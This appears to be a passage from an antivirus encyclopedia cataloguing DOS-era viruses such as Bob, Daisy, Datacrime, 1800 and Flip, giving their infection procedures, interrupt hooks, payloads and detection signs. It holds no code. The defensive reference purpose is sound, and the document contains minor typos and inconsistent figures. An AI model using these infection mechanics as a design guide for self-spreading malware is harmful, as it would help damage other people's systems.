Damage: It will delete files on the C:\ drive.
Detection method: Infected files will increase by 7296 Bytes.
Note:
1) Doesn't stay resident in memory.
2) The RNA#1 hooks INT 24h when infecting files. It omits I/O errors
(such as write protect).
[RNA#2]
Virus Name: RNA#2
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 7408 Bytes (COM and EXE)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for COM and EXE files on the C:\ drive.
2) The virus infects files four at a time.
Damage: None
Detection method: Infected files will increase by 7408 Bytes.
Note:
1) Doesn't stay resident in memory.
2) RNA#2 doesn't hook INT 24h when infecting files. It omits I/O
errors (such as write protect).
[Medical]
Virus Name: Medical
Virus Type: File Virus (infects .COM files)
Virus Length: 189 Bytes (COM)
PC Vectors Hooked: None
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It checks whether it has been infected by Medical; if "Yes", it
continues to look for another .COM file.
3) It only infects one file at a time.
Damage: None
Detection method: Infected files will increase by 189 Bytes.
Note: Doesn't stay resident in memory. Medical doesn't hook INT 24h
when infecting files. It omits I/O errors (such as write protect).
[Bob]
Virus Name: Bob
Virus Type: File Virus (infects .COM files)
Virus Length: 1117 Bytes (COM)
PC Vectors Hooked: INT 8h
Execution Procedure:
1) Searches for a .COM file in the current directory.
2) It checks whether it has been infected by Bob. If "Yes", it
continues to look for an uninfected .COM file.
3) It only infects three files at a time.
4) It then checks whether the system date is the 7th of September;
if "Yes", the virus will hook INT 8h, and about 5 minutes later,
one of the following messages is displayed on the screen: "Bob
Ross lives!", "Bob Ross is watching!", "Maybe he lives here....."
and so on.
Damage: If it is September 7, then a message will appear on the
screen.
Detection method: Infected files will increase by 1117 Bytes.
Note:
1) Doesn't stay resident in memory.
2) Bob doesn't hook INT 24h when infecting files. It omits I/O errors
(such as write protect).
[Cannabis]
Virus Name: Cannabis
Virus Type: Floppy Boot Infector
Virus Length: None.
PC Vectors Hooked: INT 13h
Execution Procedure:
1) When the system is booted from an infected disk, there will be a
1K decrease in the total system memory.
2) It then hooks INT 13h.
3) When you turn on the computer, the diskette will be infected by
hooking INT 13h.
Damage: None
Detection method: Total memory size will decrease by 1K Bytes.
Note:
1) Cannabis doesn't hook INT 24h when infecting files. It omits
I/O errors (such as write protect).
[Daisy]
Virus Name: Daisy
Virus Type: File Virus (infects .EXE files)
Virus Length: No change.
PC Vectors Hooked: None
Execution Procedure:
1) Displays a smiling face and a message on the screen: "Hi, I'm Crazy
Daisy!... I'll format your HARD DISK! ... Say goodbye to your
files!"
2) The virus then searches for an .EXE file in the A:\ drive.
3) It checks whether it has been infected by Daisy before. If
"Yes", it continues to look for another uninfected .EXE file.
4) It infects all the .EXE files on the A:\ drive.
5) Then the system halts.
Damage:
1) When all of the .EXE files on the A:\ drive have been infected,
the system halts.
2) Overwrites original files, so the length of infected files won't
increase.
3) When an infected file is executed, it randomly displays one of the
following messages:
"Pretty day today - isn't it?"
"Don't worry - sing a song!"
"Life isn't easy!"
"Don't halt your computer! Let's be friends!"
Detection method: None
Note:
1) Doesn't stay resident in memory.
2) Daisy doesn't hook INT 24h when infecting files. It omits I/O errors
(such as write protect).
[Son of PSMPC]
Virus Name: SON_OF_PSMPC
Virus Type: Virus Generator
Virus Length: 17741 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) This is a "virus generator." When you execute PC-MPC A.CFG B.CFG...,
then A.ASM B.ASM..., are generated. These will be viruses after
compiling and linking.
Detection method: None
Note:
1) Doesn't stay resident in memory.
2) SON_OF_PSMPC doesn't hook INT 24h when infecting files. It omits
I/O errors (such as write protect).
3) These generated files can have different functions such as encoding
or infecting the COMMAND.COM file.
[Ear]
Virus Name: EAR
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 1024 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) The virus searches for an .EXE or .COM file in the current directory.
2) It checks whether it has been infected by EAR. If "Yes", it
continues to look for an uninfected .COM or .EXE file.
3) It continues infecting all COM and EXE files in the current and
the "mother" directories until they are all infected.
4) It then checks whether the system date is the 1st day of the month;
if "Yes", a message appears on the screen: " PHALON/SKISM 1992
[Ear-6] Alert! Where is the Auditory Canal located? 1. External
Ear 2. Middle Ear 3. Inner Ear ", then waits for your choice.
5) If you press "1" or "3", you get the following message: " Wow,
you own your ears! Please resume work.", then it executes the
original file.
6) If you press "2" the following message appears: "You obviously no
nothing about ears. Try again after some study.", then the program
ends and doesn't execute the original file.
Damage: If system date is the 1st day of the month, a message will
appear on the screen.
Detection method: Infected files will increase by 1024 Bytes.
Note:
1) Doesn't stay resident in memory.
2) EAR doesn't hook INT 24h when infecting files. It omits I/O errors
(such as write protect).
[Dir2-910]
Virus Name: DIR2-910
Virus Type: File Virus (infects .COM and .EXE files)
Virus Length: 1024 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) When the virus loads itself resident in memory it will change the
directory structure data, so that certain executable files are
linked to itself.
2) When you execute a file to which the DIR2-910 virus has a link,
the virus is also executed. At this point it can begin to
infect other files.
3) The virus stays resident in memory but doesn't hook any interrupts.
It uses another function to infect files. It infects .COM and
.EXE files when they are "READ & WRITE".
Damage: When all the .COM and .EXE files have been infected on a
disk, then it will not be possible to execute any files from the disk.
Detection method: Check the disk by using CHKDSK.EXE. If some files
are crossed-linked to the same position, then these files must be
infected.
Note: DIR2-910 doesn't hook INT 24h when infecting files. It omits
I/O errors (such as write protect).
[INOK-2372]
Virus Name: INOK-2372
Virus Type: File Virus (infects .COM files)
Virus Length: 2372 Bytes
PC Vectors Hooked: None
Execution Procedure:
1) When the virus is executed , the following two functions are
selected at random.
a) It searches for a .COM file in the current directory. Then it
checks whether it has been infected by INOK- 2372. If "Yes",
it continues to look for another uninfected .COM file. It only
infects one file at a time. Then it executes the original
file.
b) Creates a file name "ICONKIN.COM" in the current directory,
then it executes the file. When the file is executed, a window
appears on the screen until you press a key, and after a while
the window appears again.
Damage: None
Detection method:
1) Infected files will increase by 2372 Bytes.
2) Check for a strange window.
Note:
1) Doesn't stay resident in memory.
2) INOK-2372 doesn't hook INT 24h when infecting files. It omits I/O
errors (such as write protect).
[Multi-2]
Virus Name: Multi-2
Virus Type: Partition Table Infector, File Virus (.COM and .EXE files)
Virus Length: Not Applicable
PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch, INT 13h
Execution Procedure:
1) The virus will decrease the total system memory by 3K Bytes when
the system is booted from an infected disk.
2) It then checks whether it is loaded resident in memory; if "No",
then it will load resident to the last 3K bytes of memory by
hooking INT 21h and INT 1Ch.
3) It infects files when they are executed.
Damage: None
Detection method: Infected files increase by 927-1000 Bytes.
Note: Multi-2 hooks INT 24h when infecting files. It omits I/O errors
(such as write protect).
[BFD]
Virus Name: BFD
Virus Type: Boot Virus, File Virus
Virus Length: No change
PC Vectors Hooked: INT 13h, INT 24h
Execution Procedure:
1) The virus decreases the total system memory by 2K Bytes when
the system is booted from an infected disk.
2) It loads itself resident in the last 4K Bytes of memory.
3) It hooks INT 13h.
4) When you turn on the computer the resident memory virus infects
the boot sector and files when reading and writing uninfected
disks or programs.
Damage: Overwrites original files, so the length of infected files
won't increase.
Detection method: None
Note:
1) BFD hooks INT 24h when infecting files or the boot sector. It
omits I/O errors (such as write protect).
[BFD-B]
Virus Name: BFD-B
Virus Type: File Virus, Boot Sector Infector (Multi-partite Virus)
Virus Length: No change
PC Vectors Hooked: INT 13h, INT 24h
Execution Procedure:
1) When you execute the file, it will check whether the boot sector
of the hard disk has been infected; if "No", it will infect the
boot sector.
2) It then checks whether it has loaded itself resident in memory;
if "No", then it loads itself resident in memory by hooking
INT 21h and INT 13h. After the virus has loaded itself resident
in memory it will infect boot sectors and files while reading and
writing uninfected disks or programs.
Damage: Overwrites original files, so the length of infected files
won't increase.
Detection method: None
Note:
1) BFD hooks INT 24h when infecting files or boot sectors. It omits
I/O errors (such as write protect).
[XQR]
Virus Name: XQR
Virus Type: Partition table Infector, File Virus
Virus Length: Not Applicable
PC Vectors Hooked: INT 21h, INT 24h, INT 13h, INT 8h
Execution Procedure:
1) The virus decreases the total system memory by 4K Bytes when the
system is booted from an infected disk.
2) The virus loads itself resident into the last 4K Bytes of memory.
3) It then hooks INT 13h.
4) When the computer is turned on normally the virus will check
whether the system date is May 4; if "Yes", a message will appear
on the screen: " XQR: Wherever, I love you Forever and ever! The
beautiful memory for ours in that summer time has been recorded
in Computer history . Bon voyage, my dear XQR! "
5) It continues to infect any executed program.
Damage: When it is Sunday, the virus will change the keyboard
settings.
Detection method: Check the keyboard functionality.
Note: XQR hooks INT 24h when infecting files. It omits I/O errors
(such as write protect).
[Bogus]
Virus Name: BOGUS
Virus Type: Partition table Infector, File Infector Virus
Virus Length: No change
PC Vectors Hooked: INT 21h, INT 24h, INT 13h
Execution Procedure:
1) The virus decreases the total system memory by 4K Bytes when the
system is booted from an infected disk.
2) The virus loads itself resident into the last 4K Bytes of memory.
3) It then hooks INT 13h.
4) It continues to infect any executed program.
Damage: When the number of infected files is larger than 2710, then
it destroys all data on the hard disk.
Detection method: Check whether the file head is INT 13h (AX=90 or
91).
Note:
1) BOGUS hooks INT 24h when infecting files. It omits I/O errors
(such as write protect).
2) If the computer is booted from a diskette, you will not be able to
view the hard drive.
[Invol-1]
Virus Name: INVOL-1
Virus Type: EXE and SYS and File Infector Virus
Virus Length: 1350/60 Bytes (EXE), 2720 Bytes (SYS)
PC Vectors Hooked: INT 21h
Execution Procedure:
EXE File:
1) The virus searches for the first command of C:\CONFIG.SYS; if the
command is *.*=xxxx.yyy the virus will infect the file.
2) Then it finishes executing the original file.
3) The file infects when an uninfected program is executed.
SYS File:
1) Hooks INT 21h and loads itself resident in memory.
2) Executes the original file.
Damage: Checks whether it is 20th of the month; if "Yes", then it
destroys all hard disk data.
Detection method: Infected .EXE files increase by 1350 Bytes, SYS
files increase by 2720 Bytes.
Note:
1) INVOL-1 doesn't hook INT 24h when infecting files. It omits I/O
errors (such as write protect).
[August16]
Virus Name: August16
Other names: Iron maiden
Virus Type: Parasitic Virus (infects .COM files)
Virus Length: 636 Bytes
PC Vectors Hooked: Int 21
Execution Procedure:
1) The virus checks whether the first two .COM files in the current
directory have been infected.
2) If "No" it will proceed to infect them.
3) If "Yes" it checks the current directory on the C:\ drive to see
whether it has two .COM files.
4) If "Yes" it will proceed to infect them.
5) Then the original file is executed.
Damage:
1) August16 overwrites the original file to hide changes to the file's
date and time in the directory listing.
2) Adds two text strings to infected files: "*.COM AA", "=!=IRON
MAIDEN."
Detection method:
1) .COM file growth.
2) Unexpected access to the C:\ drive.
Note: August16 doesn't hook INT 24h when infecting files. An error
message appears if there is an I/O error (such as write protect).
[BkMonday]
Virus Name: BKMonday
Other names: Virus 1055
Virus Type: File Virus
Virus Length: 1055 bytes
PC Vectors Hooked: Int 21
Damage: Formats first 240 cylinders of the first hard drive.
Detection method: Overwrites the original file in order to hide changes
to the file after infection.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Devil's_Dance]
Virus Name: Devil's_Dance
Other names: Virus 941
Virus Type: File Virus
Virus Length: 941 bytes
PC Vectors Hooked: Int 21
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: The Devil's_Dance virus monitors Int 9 (keyboard). A routine for
cursor manipulation is activated when 5 keys other than the Alt key
have been depressed. Furthermore, if the Alt key is not depressed,
attributes of the cursor in Video-RAM are changed after any other key
is pressed. The new attributes are as follows: 09h (bright blue), 0ah
(bright green), obh (bright cyan), 0ch (bright red), 0dh (bright
violet), oeh (bright yellow). If the above five keys are not pressed,
the virus will not manifest itself. If Del is depressed, the virus will
display characters using the color white. The virus displays the
following message: "Have you ever danced with the devil under the
weak light of the moon?.... Pray for your disk...The Joker HAHAHAHAHAHA
HAHAHAHA."
The virus will finally test whether any keys were pressed 2500 times.
If yes, the virus overwrites the Disk Partition Table of the first hard
disk and proceeds to crash the system.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Hero-394]
Virus Name: HERO-394
Other names: None
Virus Type: File Virus
Virus Length: Increases infected EXE file size by 394 bytes.
Damage: None
Detection method: The virus will check the system date. If it is the
first day of the month, a confusing code will be displayed on the
screen.
[NOPX_2.1]
Virus Name: NOPX_2.1
Other names: None
Virus Type: File Virus
Virus Length: Increases infected .EXE file size by 1686 bytes,
also .COM file.
PC Vectors Hooked: Int 21
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: The virus has bugs in itself (Error in calculating entry
point). So some infected EXE files can't be executed correctly.
Detection method: Increase in infected file size by 1686 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[NCU_LI]
Virus Name: NCU_Li
Other names: None
Virus Type: File Virus
Virus Length: 1690/1670 bytes
PC Vectors Hooked: Int 21
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Increase infected files size by 1690/1670 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Ghost-A]
Virus Name: GHOST-A
Other names: None
Virus Type: File Virus
Virus Length: 330 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: The executed file will be deleted after the virus has resided
in the memory and the system date is Friday. Virus then halts the
system.
Detection method: Increase in infected file size by 330 bytes.
Note:
1) Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[VVF34]
Virus Name: VVF34
Other names: None
Virus Type: File Virus
Virus Length: 1614-1624 bytes (EXE), 1614 bytes (COM)
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: The virus hooks 1Ch. After the virus has resided in memory
for 5 minutes and 15 files have already been infected, the virus will
proceed to draw a portrait in the center of the screen. The virus
will also hook interrupt 9h (keyboard interrupt). The virus will then
display the following message when the user presses any key: "Bu, Bu,
Bu..."
Detection method: Increases infected file size by 1614/1624 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Damage-B]
Virus Name: DAMAGE-B
Other names: None
Virus Type: Parasitic Virus
Virus Length: 1110 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: Virus checks the system date. If it is Tuesday, it will format
the hard disk.
Detection method: Increases infected file size by 1110 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Fam1]
Virus Name: FAM1
Other names: None
Virus Type: File Virus
Virus Length: 1063 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Increases infected file size by 1036 bytes. This
only occurs with a MONO display card.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Malaise]
Virus Name: MALAISE
Other names: None
Virus Type: File Virus
Virus Length: 1335/1365 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Increases infected files size by 1335-1365 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Walker]
Virus Name: WALKER
Other names: None
Virus Type: File Virus
Virus Length: 3845 bytes (EXE), 3852 bytes (COM)
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Interrupt 16 will be hooked. A man walking across
the screen for the duration of 14 seconds will occasionally be
displayed. Increases infected file size by 3845/3852 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Proto-T]
Virus Name: PROTO-T
Other names: None
Virus Type: File Virus
Virus Length: 695 bytes (COM)
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory. If
"No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: None
Detection method: Increases infected files size by 695 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[QMU]
Virus Name: QMU
Other names: None
Virus Type: Multi-partite Virus
Virus Length: 1513 bytes (COM)
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: Hard disk cannot be booted after the virus internal counter
reaches 100.
Detection method: Increases infected file size by 1513 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[492]
Virus Name: 492
Other names: None
Virus Type: File Virus
Virus Length: 492 bytes (COM)
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: Virus will check the system date. If it is the 14th day of
the month and it is a Saturday, the virus will erase all data on the
hard disk.
Detection method: Increases infected file size by 492 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Reaper]
Virus Name: REAPER
Other names: None
Virus Type: File Virus
Virus Length: 1072 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory. If
"No", it then loads itself resident into memory by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: The Reaper virus will check the system date after it resides in
memory. If it is Aug 21, the virus will display the following message:
"Reaper Man. (c) 92, Apache Warrior, ARCV Pres."
Detection method: Increases infected file size by 1072 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Jump4Joy]
Virus Name: JUMP4JOY
Other names: None
Virus Type: File Virus
Virus Length: 1273 bytes (COM)
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: None
Detection method: Increases infected file size by 1273 bytes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Aragorn]
Virus Name: ARAGORN
Other names: None
Virus Type: Boot Strap Sector Virus
Damage: None
Infection method: Only floppy diskette in drive A will be infected.
[Trash]
Virus Name: TRASH
Other names: None
Virus Type: Boot Strap Sector Virus
Virus Length: 1241 bytes
Damage: Virus will overwrite the Partition Table.
Detection method: Virus will not infect any files. Virus will display
the following message: "Warning!!! This program will zero (DESTROY)
the master boot record of your first hard disk. The purpose of this is
to test the anti-virus software, so be sure you have installed your
favorite protecting program before running this one! It is almost
certain that it will fail to protect you anyway. Press any key to abort,
or press Ctrl-Alt-Right Shift- F5 to proceed at your own risk." Virus
will proceed to overwrite the Partition Table if user presses
Ctrl-Alt-Right Shift-F5.
[Data Crime]
Virus Name: Datacrime
Other names: 1168, Columbus Day
Virus Type: File Virus
Virus Length: 1168 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory. If
"No", it then loads itself resident into memory by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: Virus will low-level format your hard disk after October 12.
Detection method: Virus infects all .COM files between April 1st-October
12th. After October 12th, it will display the following message:
"DATACRIME VIRUS Released:1 March 1989." It will then low-level format
your hard disk.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Datacrime II]
Virus Name: Datacrime II
Other names: None
Virus Type: File Virus
Virus Length: Increases .COM and .EXE files by 1514 bytes.
Damage: Virus will low-level format cylinder 0 of your hard disk
after October 12.
Detection method: Between October 12th-31st, excluding Mondays, the
virus will display the following message: "DATACRIME-2 VIRUS." The
virus will proceed to low-level format cylinder 0 of the hard disk.
Then the system will hang.
[Marauder]
Virus Name: Marauder
Other names: None
Virus Type: File Virus
Virus Length: Increases .COM file by 860 bytes.
Execution Procedure:
1) The virus searches the current directory for a .COM file. Once it
locates a file it checks whether it is already infected by the
Marauder virus. If "No", it then infects the file.
2) If "Yes" then it searches for another .COM file to infect. b) It
doesn't infect .EXE files.
3) It then executes the original file.
Damage: The Marauder virus will overwrite your files every February 2
with the string "=[Marauder] 1992 Hellraiser -Phalcon/Skism."
Detection method: When the infected file is executed, the virus will
infect the first uninfected .COM file in the current directory.
Every February 2, the virus will overwrite all executed files by
following characters one by one "=[Aarauder] 1992 Hellraiser -
Phalcon/skism."
[Oropax]
Virus Name: Oropax
Other names: None
Virus Type: File Virus
Virus Length: 2756-2800 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: Infected .COM file sizes increase by 2756-2800 bytes.
Detection method: Virus will hook interrupt 20h, 21h, 27h. If the
system date is after May 1, 1987 and it is an IBM-compatible computer,
interrupt 8h will be hooked. When the virus is triggered, it will play
the "Stars", "Blue" and "Forty" songs one by one every eight minutes.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[dBASE]
Virus Name: dBASE
Other names: None
Virus Type: File Virus
Virus Length: 1864 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory. If
"No", it then loads itself resident into memory by hooking INT
21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE files.
Damage: Every executed .COM file increases by 1864 bytes. Virus will
sometimes cause system to halt.
Detection method: Virus will hook interrupt 21h. When the virus is
activated, it will switch high-byte and low-byte of every opened .DBF
data files. Virus will also create a hidden file - "BUG.DAT" in the
root directory of every infected .DBF file name.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Halloween]
Virus Name: Halloween
Other names: Happy Halloween
Virus Type: File Virus
Virus Length: N/A
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory. If
"No", it then loads itself resident into memory by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: Virus finds an executable file (first .EXE file then .COM) in
current directory and proceeds to infect it. It will display "Runtime
error 002 at 0000:0511" on screen if no uninfected files are found.
Detection method: Every Oct 31, the virus will create a 10KB-long file
and display "Runtime error 150 at 0000:0AC8."
Note:
1) Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Kennedy]
Virus Name: Kennedy
Other names: None
Virus Type: File Virus
Virus Length: 333 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory. If
"No", it then loads itself resident into memory by hooking INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed.
Damage: Virus destroys FAT.
Detection method: On June 6, November 8, and November 22, the virus
will display the following message:
"Kennedy is dead - long live the Dead Kennedys."
Virus proceeds to destroy FAT.
Note: Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Virus-90]
Virus Name: Virus-90
Other names: None
Virus Type: File Virus
Virus Length: 857 bytes (COM)
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) It then executes the original file.
3) With itself loaded resident into memory it will infect any
uninfected file that is executed. b) It doesn't infect .EXE
files.
Damage: Infected .COM files increase by 857 bytes.
Detection method: Virus displays "Infected" when a file gets infected.
Note:
1) Loads itself resident in memory. An error message appears if
there is an I/O error (such as write protect).
[Lehigh]
Virus Name: Lehigh
Other names: None
Virus Type: Parasitic Virus (infects COMMAND.COM only)
Virus Length: 555 bytes
Execution Procedure:
1) The virus checks whether it is already loaded resident in memory.
If "No", it then loads itself resident into memory by hooking
INT 21h.
2) Then when a disk is accessed and if COMMAND.COM is uninfected it
will immediately infect it and execute the original file.
3) With itself loaded resident into memory it checks for any
uninfected file that is executed. b) It doesn't infect .EXE
files.
Damage:
1) Infects the disk's COMMAND.COM file and increases its size by
555 bytes.
2) When the infection count is more than four the current disk will
be trashed.
[Como]
Virus Name: Como
Virus Type: File Virus
Virus Length: 2,020/2,030 bytes (EXE)
PC Vectors Hooked: None
Execution Procedure:
1) It searches for an EXE file in the current directory.
2) Then it checks if the file has been infected. If Yes", it continues
to search.
3) If an uninfected file is found, there is 50% probability for the
file to get infected.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. When running an
uninfected program, the program will get infected.
2) Before infecting files, the virus displays: "It's your task to find
and delete them, best wishes. Press a key to execute the prompt."
Damage: None
Detection method: Check if the file length increases by 2,020/2,030
bytes.
Remarks:
1) Non memory resident.
2) Before infecting files, the virus hooks INT 24h in order to omit
the I/O error messages.
[512]
Virus Name: 512
Virus Type: File Virus
Virus Length: 512 bytes
Symptoms: None
Execution Procedure: Virus does not contain any damage routine,
but its spreading mechanism presents a great danger to the
infected file. The beginning is saved outside the file in free
space in the allocated cluster. When copying such a program,
this part is not copied together with the rest of the file,
causing the original program to be destroyed.
Other manifested problems to files are: when an infected file is
read with the virus already in the memory, it tests as a virus
flag only the time of the last modification (62 seconds) and not
the actual file content. The same virus flag is used by viruses
648 and 1560 and some users have their programs immunized
against virus 648. The result is that, the nonsense data which
lies at the end of an infected file will be read rather than the
actual file content.
[744]
Virus Name: 744
Virus Type: Parasitic Virus
Virus Length: 744 bytes
Symptoms: Increases infected file sizes by 744 bytes. Destroyed
programs will cause computer to crash in most cases.
Damage: With the probability of 1:7 the virus will not infect
other files but will destroy the founded file. Virus writes the
instruction JMP [BP+0] at the start of program. Virus contains an
error. It should write JMP F000:FFF0 instruction (computer
reboot - same as virus 648), which is 4 bytes from the actually
written instruction. Length of destroyed program is not changed.
This program contains a virus flag. Reads and writes using DOS
interrupts. When virus finds a program which can be infected, it
reads and without any change writes to sector number 1 (FAT
area). This is not done on the disk C:. It is done as a test
whether the disk is write protected or not.
[1800]
Virus Name: 1800
Other Names: Bulgarian virus, Sofia virus, Dark Avenger Virus
Type: Parasitic Virus
Virus Length: cca 1800 bytes
Symptoms: Increases infected file sizes by cca 1800 bytes (in the
case of EXE files it performs paragraph alignment). Decreases
size of free RAM memory. Infected files contain the following
strings:
"Eddie lives...somewhere in time!", "Diana P." a "This
program was written in the city of Sofia (C) 1988-89 Dark
Avenger."
Damage: Virus reads boot sector of the disk, and in it (offset
10, OEM decimal version) marks the number of programs, which are
run from the given disk MOD 16. If it is zero (after every 16
programs!!), it overwrites random cluster on the disk with part
of its own code. The cluster number is then stored in the boot
sector at the position at offset 8 (OEM main version). Modifies
boot sector then writes back on the disk.
[V2000]
Virus Name: V2000
Other Names: 21 century virus
Virus Type: Parasitic Virus
Virus Length: 2000 bytes
Symptoms: Increases infected .COM and .EXE file sizes by 2000
bytes. Decreases size of free RAM memory by 4KB. Infected files
contain the following strings:
"(C) 1989 by Vesselin Bontchev"
Damage: None
[2343]
Virus Name: 2343
Other Names: Flip virus
Virus Type: Multi-partite Virus
Virus Length: 2343 bytes
Symptoms: Increases infected .COM and .EXE file sizes by 2343
bytes. Decreases size of free RAM memory with 2864 bytes. New
DOS function 0FE01h is implemented, when virus is active in
memory, it returns 01FEh in AX. Word 028h in DPT sector
contains the value 0FE01h. Flip virus has the same virus flag as
the viruses 648, 1560 (ALABAMA) and 512: it sets the number of
seconds in the file's time stamp to the nonsense value of 62.
Infected files contain the following strings:
"OMICRON by PsychoBlast"
Damage: Under certain conditions virus "flips" the screen. If the
damage routine is active, virus contains bit reversed of screen
font 8*14 and monitors the interrupt 10h. When video mode is
changed to the mode 2 or 3 the special routine for interrupt 1Ch
is activated. All other video modes are interrupt vector 1Ch set
to IRET instruction. For video modes 2 and 3, the video start
address is set to 1000h. The memory at segment 0BA00h is used as
video memory rather than 0B800h. On every call of interrupt 1Ch
(18.2 times per second) virus copies 500 words (characters and
their attributes) from memory segment 0B800h into memory segment
0BA00h with inversion of rows and columns.
[Pojer]
Virus Name: Pojer
Virus Type: Parasitic Virus
Virus Length: Infected EXE and COM files increase by 1919 Bytes
PC Vectors Hooked: INT 21h and INT 24h
Execution Procedure:
1) Checks whether it already resides in memory. If not, hooks INT
21h and resides in the highest memory, and then executes the
host program.
2) If it already resides in the highest memory, the host program
will be executed immediately
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. The uninfected
files will be infected when they are executed.
2) Before infecting files Pojer will hook INT 24h in order to
ignore the I/O errors.
Damage: None
Detection method: Detectable if the lengths of files increase
by 1919 Bytes.
[Drop]
Virus Name: Drop
Virus. Type: Parasitic Virus.
Virus Length: Infected EXE file sizes increase by 1130-1155
Bytes and COM files increase by 1131 Bytes.
PC Vectors Hooked: INT 21h
Execution Procedure:
1) Checks whether it resides in memory or not. If not, hooks INT
21h and resides in the highest memory, and then executes the
host program (If it already resides in the highest memory, the
host program will be executed directly).
2) Then checks system date. It will hook INT 21h if the date is
"the sixth day of the month". The characters on the screen
will drop and the system will hang when any program is
executed.
Infection Procedure:
1) The virus infects files by AH=4B in INT 21h. The non-infected
files will be infected when they are executed.
